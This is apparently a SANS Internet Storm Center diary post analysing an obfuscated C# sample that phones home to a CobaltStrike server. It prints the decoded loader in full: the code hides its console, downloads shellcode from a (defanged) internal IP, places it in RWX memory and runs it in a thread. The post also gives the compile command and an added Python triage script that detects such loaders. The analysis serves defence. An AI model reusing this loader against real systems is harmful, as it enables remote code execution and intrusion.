CSharp Payload Phoning to a CobaltStrike Server, (Fri, Dec 15th)


I found an interesting piece of CSharp source code on VT a few days ago. Its score is only 3/59 (SHA256:5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a)[1].

It has been a long time since I saw payloads ready to be compiled. I did some research on self-compiling malware in 2020[2]. I think the file was uploaded on VT to verify the detection rate by AV vendors because the CobaltStrike server is a private IP address. Or was it in the scope of some Red team exercise?

The code is obfuscated with junk characters that are removed during execution:

string pRVSczAKPboj = "u>(hs>(hi>(hn>(hg>(h
[...payload removed...]
>(h >(h0>(hx>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(h)>(h;>(h}>(h}>(h}".Replace(">(h", "");

Here is the decoded payload, which is easy to understand:

using System;
using System.Net;
using System.Runtime.InteropServices;
namespace GnRiolRYuAcH 
{
    public class EpQmktOhiwXb 
    {
        [DllImport ("kernel32")] private static extern UInt64 VirtualAlloc (UInt64 zJAjSroWZVkI, UInt64 KaWcaAtEjRML, UInt64 PRZMeuJQylhj, UInt64 lDLVdityOBmY); 
        [DllImport ("kernel32")] private static extern IntPtr CreateThread (UInt64 NxVjPRlolSsT, UInt64 EZnBMZtLXzTZ, UInt64 mNXqHtnujBJm, IntPtr BVcXnWWYhroa, UInt64 rckVAtyTWXhW, ref UInt64 OUmSsFQyEEnY);
        [DllImport ("kernel32")] private static extern UInt64 WaitForSingleObject (IntPtr ucXgBIyufbdT, UInt64 nmJKJtodAzHm);
        [DllImport ("kernel32.dll")] static extern IntPtr GetConsoleWindow ();
        [DllImport ("user32.dll")] static extern bool ShowWindow (IntPtr holpJgOYqcKG, int viaQwLWOkGFp);
        public static void Main () 
        {
            ShowWindow (GetConsoleWindow (), 0);
            WebClient sbTBMGCfElPa = new System.Net.WebClient ();
            sbTBMGCfElPa.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");
            sbTBMGCfElPa.Headers.Add ("Accept", "*/*");
            sbTBMGCfElPa.Headers.Add ("Accept-Language", "en-gb,en;q=0.5");
            byte[] AjVmuebayNvb = null;
            AjVmuebayNvb = sbTBMGCfElPa.DownloadData ("hxxp://192[.]168[.]1[.]28:1234/Qm3k");
            byte[] BlAVsJsniHyM = new byte[AjVmuebayNvb.Length - 0];
            Array.Copy (AjVmuebayNvb, 0, BlAVsJsniHyM, 0, BlAVsJsniHyM.Length);
            UInt64 gltoUfDFqsfu = VirtualAlloc (0, (UInt64) BlAVsJsniHyM.Length, 0x1000, 0x40);
            Marshal.Copy (BlAVsJsniHyM, 0, (IntPtr) (gltoUfDFqsfu), BlAVsJsniHyM.Length);
            IntPtr wnvVIenBotAX = IntPtr.Zero;
            UInt64 DfVxARfvlcwx = 0;
            IntPtr YBKUjHKOUGUq = IntPtr.Zero;
            wnvVIenBotAX = CreateThread (0, 0, gltoUfDFqsfu, YBKUjHKOUGUq, 0, ref DfVxARfvlcwx);
            WaitForSingleObject (wnvVIenBotAX, 0xFFFFFFFF);
        }
    }
}

The behavior is classic: some READ_WRITE_EXECUTE (0x40) memory is allocated, and the payload returned by the HTTP request to the internal IP is injected and started in a new thread.
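
A static triage check for source files of this kind, as an added example that is not code from the original diary: it reverses the "literal".Replace(junk, "") padding and flags the loader traits described above in the decoded text. The function names, indicator labels and the sample fragment are constructed for illustration.

```python
import re

# A C# string literal immediately followed by .Replace("<junk>", ""),
# the obfuscation pattern shown in the post. Escapes inside the literal
# are matched as units but left undecoded.
OBFUSCATED = re.compile(
    r'"((?:[^"\\]|\\.)*)"\s*\.Replace\s*\(\s*"((?:[^"\\]|\\.)+)"\s*,\s*""\s*\)',
    re.DOTALL,
)

# Loader traits described in the post, checked against the decoded text.
INDICATORS = {
    "P/Invoke VirtualAlloc": re.compile(r"\bextern\b[^;]*\bVirtualAlloc\b"),
    "P/Invoke CreateThread": re.compile(r"\bextern\b[^;]*\bCreateThread\b"),
    "WebClient.DownloadData": re.compile(r"\.DownloadData\s*\("),
    "RWX allocation (0x40)": re.compile(r"\bVirtualAlloc\s*\([^;]*\b0x40\s*\)"),
    "hidden console window": re.compile(r"\bShowWindow\s*\(\s*GetConsoleWindow\b"),
}


def deobfuscate(source):
    """Decode every "literal".Replace("junk", "") found in the source text."""
    return [m.group(1).replace(m.group(2), "") for m in OBFUSCATED.finditer(source)]


def triage(source):
    """Return (decoded_text, sorted_indicator_names) for each decoded literal."""
    results = []
    for decoded in deobfuscate(source):
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(decoded))
        results.append((decoded, hits))
    return results


# Constructed sample: a non-functional fragment, junk-padded like the post's string.
JUNK = ">(h"
FRAGMENT = (
    "private static extern UInt64 VirtualAlloc (UInt64 a, UInt64 b, UInt64 c, UInt64 d); "
    "byte[] buf = wc.DownloadData (url); "
    "UInt64 p = VirtualAlloc (0, (UInt64) buf.Length, 0x1000, 0x40);"
)
SAMPLE = 'string s = "' + JUNK.join(FRAGMENT) + '".Replace("' + JUNK + '", "");'
BENIGN = 'string t = "2023-12-15".Replace("-", "");'

if __name__ == "__main__":
    for decoded, hits in triage(SAMPLE + "\n" + BENIGN):
        print(len(decoded), "chars decoded; indicators:", hits or "none")
```

An ordinary Replace call such as the BENIGN line is decoded too but produces no indicator hits, so the decoded content, not the Replace pattern alone, drives the verdict.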

This can be compiled and executed on any Windows computer with a .NET Framework installed (read: 99% of them!):

C:\Windows\Microsoft.NET\Framework\v4.0.30319>csc.exe /t:exe /out:payload.exe c:\users\rem\Desktop\pJmOrSymbiAM.cs

Indeed, all of you have a compiler installed on your computers, even if you’re not developers!

Usually, this kind of code is written in PowerShell, but this technique looks stealthier. Or maybe not! I uploaded my compiled file to VT, which got a bad score of 36/72[4].

[1] https://www.virustotal.com/gui/file/5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a/detection
[2] https://www.sans.org/webcasts/atmic-talk-self-compiling-malware-114085/
[3] https://isc.sans.edu/diary/Finding+Metasploit+Cobalt+Strike+URLs/27204
[4] https://www.virustotal.com/gui/file/2bd26546e09eff4675d020dab3da4fc6cb08bad9637905ac792d16a4a8937bcf/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
